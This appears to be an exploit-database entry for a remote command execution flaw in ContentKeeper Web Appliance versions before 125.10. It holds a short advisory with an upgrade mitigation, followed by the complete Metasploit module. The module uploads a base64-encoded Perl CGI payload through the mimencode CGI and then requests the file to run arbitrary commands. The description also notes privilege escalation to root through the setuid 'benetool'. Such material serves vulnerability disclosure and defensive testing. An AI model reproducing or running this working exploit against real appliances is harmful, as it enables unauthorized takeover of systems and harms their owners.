ContentKeeper Web Remote Command Execution

vendor:

Web Appliance

by:

patrick

7.5

CVSS

HIGH

Remote Command Execution

CWE

Product Name: Web Appliance

Affected Version From: prior to 125.10

Affected Version To: 125.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unix

2009

ContentKeeper Web Remote Command Execution

This module exploits the ContentKeeper Web Appliance. Versions prior to 125.10 are affected. This module exploits a combination of weaknesses to enable remote command execution as the Apache user. Following exploitation it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool' to escalate to root.

Mitigation:

Upgrade to ContentKeeper Web Appliance version 125.10 or later.

Source

Exploit-DB raw data:

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'ContentKeeper Web Remote Command Execution',
			'Description'	=> %q{
				This module exploits the ContentKeeper Web Appliance. Versions prior
				to 125.10 are affected. This module exploits a combination of weaknesses
				to enable remote command execution as the Apache user. Following exploitation
				it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
				to escalate to root.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_CMD ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'OSVDB', '54551'],
				[ 'OSVDB', '54552'],
				[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
			],
			'Privileged'		=> false,
			'Payload'        =>
				{
					'DisableNops' => true,
					'Space'       => 1024,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl ruby telnet',
						}
				},			
			'Platform' => ['unix'],
			'Targets'  =>
			[
				[ 'Automatic', { } ]
			],
			'DisclosureDate' => 'Feb 25 2009',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(80),
			],self.class)
	end

	def check
		connect
		sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /500 Internal/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit

		exp = "#!/usr/bin/perl\n"
		exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
		exp << "system(\""
		exp << payload.encoded.gsub('"', '\"')
		exp << "\");\n"

		body = Rex::Text.encode_base64(exp)

		connect

		sploit = "POST /cgi-bin/ck/mimencode?-u+-o+bak.txt HTTP/1.1\r\n"
		sploit << "Host: #{datastore['RHOST']}\r\n"
		sploit << "Content-Length: #{body.length}\r\n\r\n"

		print_status("Uploading payload to target.")
		sock.put(sploit + body + "\r\n\r\n")
		disconnect

		sleep(5)
		print_status("Calling payload...")
		connect
		req = "GET /cgi-bin/ck/bak.txt HTTP/1.1\r\n" # bak.txt is owned by apache, chmod 777 :) rwx
		req << "Host: #{datastore['RHOST']}\r\n"
		sock.put(req + "\r\n\r\n")

		handler
		disconnect
	end
end